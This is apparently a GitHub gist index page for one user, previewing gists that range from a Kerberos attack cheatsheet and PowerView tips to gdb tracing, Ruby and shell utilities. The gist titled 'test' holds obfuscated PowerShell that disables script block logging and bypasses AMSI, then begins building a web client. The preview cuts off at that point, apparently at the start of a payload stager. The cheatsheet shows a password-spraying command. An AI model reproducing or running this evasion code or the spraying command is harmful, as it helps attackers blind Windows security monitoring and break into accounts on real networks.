
robvinson /
Created Jul 25, 2020 — forked from TarlogicSecurity/
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

robvinson / PowerView-3.0-tricks.ps1
Created Jun 25, 2020 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View test
IF($PSVerSIonTabLE.PSVeRsIon.MAJoR -Ge 3){$GPF=[Ref].ASsemBlY.GETTYpe('System.Management.Automation.Utils')."GEtFIE`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GetVaLUe($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAL=[CollECTIONS.GEnerIc.DICtiONaRY[STriNg,SyStEM.OBJecT]]::NeW();$VaL.ADD('EnableScriptB'+'lockLogging',0);$VAL.ADd('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ELsE{[SCrIPTBLock]."GetFie`LD"('signatures','N'+'onPublic,Static').SetVAlUE($NUll,(NEw-OBJECt CollectIons.GenERIc.HAshSeT[strINg]))}[REF].AssEMBLY.GEtType('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFieLd('amsiInitFailed','NonPublic,Static').SETVALuE($nULL,$true)};};[SYStEM.NET.SERVIcePOINtMANaGER]::ExPEcT100CoNTiNue=0;$Wc=NEw-OBJeCt SysTEM.NeT.WebCLIEnt;$u='Mozilla/5.0 (compat

Keybase proof

I hereby claim:

  • I am robvinson on github.
  • I am robvinson on keybase.
  • I have a public key whose fingerprint is A820 6BA2 B5A5 D565 5BBD 8F76 50EB 0F9C B6B6 8E33

To claim this, I am signing this object:

View iteration-guesser.rb
#!/usr/bin/env ruby
require 'openssl'
SHA1 =
# Verified functionality against
# Test Vector (
# Input:
# P = "password" (8 octets)
View parse_encrypt_dump_file.c
To be used with an output file created by breaking
on the encrypt function with gdb, and grabbing its
attach --waitfor SomeProgram
break encrypt
View tracer.gdb
set logging file /tmp/Good-log.txt
set logging on
attach --waitfor Good
### Generic objective-c tracing
b objc_msgSend
# print class name and method name
printf "-[%s %s]\n", (char *)class_getName(*(long *)$r0,$r1),$r1
robvinson / gist:3504621
Created Aug 28, 2012
ruby preforking test program
View gist:3504621
#!/usr/bin/env ruby
# The trap is guaranteed to happen, and guaranteed to happen only
# once, right before the process exits for any reason (unless
# it's terminated with a SIGKILL).
#trap('EXIT') { acceptor.close }
CONTROL[0], CONTROL[1] = IO.pipe
robvinson /
Created May 18, 2012
Get index page from web servers
mkdir $DSTDIR
is_empty() {
if [ -s "$1" ]; then #exists and is not empty
return 1
fi
if [ -f "$1" ]; then #file exists and is empty
return 0
fi
}